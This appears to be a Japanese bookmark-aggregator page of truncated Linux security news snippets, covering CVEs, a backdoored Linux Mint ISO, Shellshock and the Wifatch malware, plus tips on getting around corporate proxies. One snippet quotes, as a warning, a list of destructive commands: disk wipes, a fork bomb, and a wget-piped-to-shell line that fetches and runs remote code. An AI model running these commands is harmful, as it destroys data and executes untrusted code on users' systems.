Parrots in captivity seem to enjoy video-chatting with their friends on Messenger
インテルx86マシンの奥深くでは人知れず「MINIX 3」が動作しており、脆弱性を作り出している。Googleらはそれを排除しようとしている インテルのx86プロセッサを用いたシステムでは、その奥深くで人知れずMINIX 3を含む2つほどのカーネルがプロセッサ上で稼働しているOSとは別に作動しており、それが脆弱性を作り出しているとGoogleのエンジニアらが警告し、それを取り除こうという動きを見せています。 それが、10月23日から26日までチェコ共和国のプラハで行われたOpen Source Summit EuropeでGoogleのRonald Minnich氏のセッション「Replace Your Exploit-Ridden Firmware with Linux」(脆弱性にまみれたファームウェアをLinuxで置き換える)のセッションで説明されたことでした。 これを、海外のメディア
GNOMEのファイルマネージャー「GNOME File (Nautilus)」で任意のVBScriptコードを実行可能な脆弱性「Bad Taste」が発見された(発見者による解説記事、 The Registerの記事、 Neowinの記事、 Bleeping Computerの記事、 CVE-2017-11421)。 問題はWindowsの実行ファイル(.exe)やWindowsインストーラーパッケージ(MSIファイル: .msi)などのアイコンをGNOME File上で表示するために使われる「gnome-exe-thumbnailer」のバージョン0.9.4-2以前に存在し、Wineがインストールされた環境で再現する。また、GNOME Fileのほか、「Cinnamon Nemo」や「MATE caja」といったファイルマネージャーも影響を受けるとのこと。 バージョン0.9.4-2までの
5月25日、基本ソフト(OS)Linux(リナックス)やUNIX向けに開発された無料通信ソフト「Samba」(サンバ)に新しく欠陥が見つかったことが分かった。写真は13日撮影(2017年 ロイター/KACPER PEMPEL) [シンガポール 25日 ロイター] - 基本ソフト(OS)Linux(リナックス)やUNIX向けに開発された無料通信ソフト「Samba」(サンバ)に新しく欠陥が見つかったことが分かった。サイバーセキュリティー会社によると、世界で30万台以上のコンピューターに感染したランサムウエア「WannaCry(ワナクライ)」と同様の被害が発生する危険性があるという。 米ラピッドセブンのレベッカ・ブラウン氏はロイターに対し、発見の発表後12時間以内にハッカー集団がこのぜい弱性を悪用している証拠は見つかっていないと指摘した。だが、研究者らが欠陥を悪用するマルウェア(悪意のあるソフト
はじめに タイトルの通り、社内Proxyがあるために、yumとかgit cloneができない人のためのTipsです。 Proxyに関する前提条件は以下の通りです。 社内Proxyがある。 ProxyはID/Passの認証がある FQDNによって制限されているページがある。(Blacklist方式) Proxyに直接アクセスできないネットワークにある。(間接的にはアクセスできる) またOSは主にLinux(CentOS,Ubuntu)ですが、Windows+Cygwinの話もたまにします。 ProxyのServerとPortは、proxysrv:port。ProxyのIDはid、Passはpassと表現します。 適宜読み替えてください。 注意事項 全て自己責任でお願いします。 理由(だいたいの場合がセキュリティ)があって、会社はこのような制限を設けています。 またこれの手っ取り早い解決方法は
先日Twitterに次のような書き込みをしたところ思ったより反応が良かったので、詳細の設定を紹介します。 UDP53番、TCP443番、UDP123番とポートノッキングをするとTCP443番に10秒だけsshdが現れる、という中二病全開の設定をした。皆様にもお勧めしたい。— hnw (@hnw) 2017年3月26日 といっても特殊なことをしたわけではなく、knockdでポートノッキングの設定を行い、iptablesと組み合わせて実現しました。 ポートノッキングとは ポートノッキングというのは、決められたポートを決められた順番で叩くことでファイアーウォールに穴を空けられるような仕組みのことです。ポートノッキングを使えば、TCPの7000番、8000番、9000番の3ポートにパケットを送りつけると22番ポート (SSH) へのアクセスが許可される、といった設定ができます。 ポートノッキングの
主要なLinuxディストリビューションの「Linux Unified Key Setup-on-disk-format」(LUKS)に、セキュリティホールが存在することが明らかになった。LUKSはLinuxで使われているハードディスク暗号化のための標準的な仕組みだ。LUKSは多くの場合、「cryptsetup」というユーティリティを使用してセットアップされている。この脆弱性はcryptsetupに存在するもので、かなり深刻度が高く、影響を受けるLinuxディストリビューションには、「Debian」、「Ubuntu」、「Fedora」、「Red Hat Enterpise Linux」(RHEL)、「SUSE Linux Enterprise Server」(SLES)が含まれる。 セキュリティレポートCVE-2016-4484には、このセキュリティホールを利用すると、攻撃者は「対象システム
fossBytesに8月20日(米国時間)に掲載された記事「10 Most Dangerous Linux Commands You Should Never Run」が、実行すると修復することが不可能な損害を与えかねないLinuxコマンド、または修復できてもひどいことになるLinuxkコマンド10選を伝えた。 紹介されているコマンドは次のとおり。 rm -Rf / shred /dev/sda dd if=/dev/random of=/dev/sda mkfs.ext4 /dev/sda1 mv / /dev/null :(){:|:&};: wget http://unknownsource.com/possiblydangerous.sh -O- | sh gunzip untrusted.gz command > file.conf ^mistake^correction UNI
社内に立てたCAの証明書をLinuxに入れる必要があったので方法を調べたのでまとめる。 UbuntuとCentOS 7は、それぞれ同じような方法で実施できる。 /usr/share/pki/ca-trust-source/anchors に、CA証明書を配置する。 $ sudo cp mycacert.crt /usr/share/pki/ca-trust-source/anchors update-ca-trustコマンドを実行する。 $ sudo update-ca-trust extract /usr/share/ca-certificates に、CA証明書を配置する。 $ sudo cp mycacert.crt /usr/share/ca-certificates /etc/ca-certificates.confに、/usr/share/ce-certificetsからの相対
何者かがLinux Mint ISOを改ざんしてバックドアを仕込み、同プロジェクトのWebサイトをハッキングして改ざん版をダウンロードさせていた。 Linuxディストリビューション「Linux Mint」は2月21日のブログに掲載した告知で、何者かがLinux Mint ISOを改ざんしてバックドアを仕込み、同プロジェクトのWebサイトをハッキングして改ざん版をダウンロードさせていたことが分かったと発表した。 さらに、Linux Mintフォーラムのデータベースも20日に攻撃され、ユーザー情報が流出した可能性があることも判明。「forums.linuxmint.com」のアカウントを開設しているユーザーは、できるだけ早くパスワードを変更するよう呼び掛けた。 改ざんされていたのは「Linux Mint 17.3 Cinnamon」エディションで、影響を受けるのは2月20日にこのエディションを
By The Preiser Project アンチウイルスソフトウェアで知られるSymantecが2014年に発見した「Linux.Wifatch」は、Linuxを搭載する1万台ものルーターに感染しておきながら、悪さをするどころかデバイスのセキュリティを高めていることがわかっています。悪用されることが多いハッキングを善良な目的に使っていると見られることから、「ホワイトハッカーが登場した」などとインターネットで話題を呼びましたが、そのLinux.Wifatchを開発したハッカーがなんとマルウェアのコードを公開し、ハッキングの目的や自分の正体について語っており、さらに経済誌のForbesはこのハッカーと接触してインタビューを実施しています。 The White Team / linux.wifatch | GitLab https://gitlab.com/rav7teif/linux.wi
by Peter Dahlgren ユーザーのネットワークに侵入したマルウェアは、侵入した後にさらなる攻撃を仕掛けるためにユーザーのルーターを利用することが多々あります。しかし、Symantecが発見したLinux.Wifatchというマルウェアは、Linuxを搭載する1万台ものルーターに感染しておきながら、悪用ではなくむしろ「デバイスのセキュリティを高める動き」をしていたことがわかりました。 Is there an Internet-of-Things vigilante out there? | Communauté Symantec Connect http://www.symantec.com/connect/blogs/there-internet-things-vigilante-out-there Someone Has Hacked 10,000 Home Routers
Steven J. Vaughan-Nichols (Special to ZDNET.com) 翻訳校正: 編集部 2015-01-28 10:04 クラウドセキュリティ企業Qualysの研究者が、Linux GNU Cライブラリ(glibc)に深刻なセキュリティホールである「GHOST」(CVE-2015-0235)を発見した。この脆弱性を利用すると、ハッカーはIDやパスワードを知らなくてもシステムをリモートから乗っ取ることができる。 Qualysはただちにこのセキュリティホールについて主なLinuxの配布元に警告を送り、多くの配布元がすでにパッチを公開している。 このセキュリティホールは、glibc-2.2(2000年11月10日にリリース)を使用してビルドされたすべてのLinuxシステムに存在する。Qualysによれば、このバグは実際には、2013年5月21日にリリースされた、gl
概要 社内プロキシに様々なサイトへのアクセスをブロックされたり、社外サーバにsshできなかったりする人向けに社外プロキシを立ててあらゆるサイトにアクセスする方法のまとめです。(後述しますが半分くらいネタポストです。) 他にも以下のような効果がありますので、プロキシフリーな会社にお勤めもし良かったら参考にして頂ければと思います。 なぜか2015年になっても存在するカフェとかホテルとかでの保護されていなかったりする無線wifiを使っても盗聴されない。 日本からアクセスできないサイトにアクセスできる。(海外のデータセンタ上のVMを使った場合) なお、非認証プロキシを例にしてます。認証プロキシでもあまり変わらないとは思いますが、環境が無いため未確認です。また、プロキシの挙動や設定方法はプロキシサーバの種類や設定によって多岐に渡るため、全てのプロキシで同じ方法が使えるとは限らないとは思います。 最後
パソコンのキーボード。豪シドニー(Sydney)で(2012年7月9日撮影)。(c)AFP/Greg WOOD 【9月26日 AFP】米政府とIT専門家らは25日、米アップル(Apple)の「Mac OS」を含む一部の基本ソフト(OS)の脆弱(ぜいじゃく)性によって、広範囲かつ深刻なサイバー攻撃が発生する恐れがあると注意を呼び掛けた。 米国土安全保障省(Department of Homeland Security)コンピューター緊急対応チーム(Computer Emergency Response Team、CERT)によると、リナックス(Linux)やMac OSなどの「ユニックス(Unix)ベースのOS」が、この不具合によって影響を受ける恐れがある。 CERTは、ハッカーがこれを悪用すると、コンピューターが乗っ取られる可能性があると指摘。「こうした脆弱性の悪用によって、遠隔地の攻撃者
Browse by time: December 2018 (1) December 2016 (1) December 2015 (1) January 2015 (1) September 2014 (2) July 2014 (2) April 2014 (1) February 2014 (1) January 2014 (3) December 2013 (2) September 2013 (3) June 2013 (1) May 2013 (1) April 2013 (1) March 2013 (2) February 2013 (5) やっと更新する気になった。 もくじ 0. 産業で説明 1. 理論編 2. 攻撃編 3. パッチ 4. 結論 0. 産業で説明 bashが アホで 地球がヤバイ 1. 理論編 bashの関数機能は、環境変数の中でも使える仕様になっています
bashに脆弱性が確認されたとして騒ぎになっています。ここではCVE-2014-6271に関する情報をまとめます。 #記載内容について、誤っている、追記した方がいい等情報がございましたら@piyokangoまでご連絡お願いします。 脆弱性情報 脆弱性の愛称 ShellShock Bashbug CVE番号 Bash周りで発行されているCVEは6つ。その内詳細が不明なのが2つ。(CVE-2014-6277,CVE-2014-6278) CVE 発見者 想定脅威 特記 CVE-2014-6271 Stephane Chazelas氏 任意のコード実行 ShellShockの発端となったバグ。 CVE-2014-7169 Tavis Ormandy氏 任意のコード実行 CVE-2014-6271修正漏れによる脆弱性 CVE-2014-7186 Redhat DoS メモリ破壊(Out-of-Bo
This article was originally published on the Red Hat Customer Portal. The information may no longer be current. Update 2014-09-30 19:30 UTC Questions have arisen around whether Red Hat products are vulnerable to CVE-2014-6277 and CVE-2014-6278. We have determined that RHSA-2014:1306, RHSA-2014:1311, and RHSA-2014:1312 successfully mitigate the vulnerability and no additional actions need to be ta
SELinuxは強制アクセス制御(MAC:Mandatory access control)とよばれる管理者による権限管理機能を提供する仕組みのひとつです。FISC(金融情報システムセンター)やNISC(内閣官房情報セキュリティセンター)などのガイドラインには強制アクセス制御に関する規定が存在し、もともとは政府の規定を満たすために作成されたのがSELinuxらしいです。 以上の説明やアットマークITのような経営者向けサイトを見ると、SELinuxは、いかにもコンサルタント様が導入を検討しそうな素晴らしい機能ですが、運用を行うのは至難の業です。 以下、私がSELinuxハンズオン – hbstudy #28に参加した時のメモを記します。何となく読んで頂きSELinuxの運用が如何に難しいかを悟って頂けると幸いです。なお、実務でのお役立ち度は期待しないでください。私がSELinuxを勉強して役
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く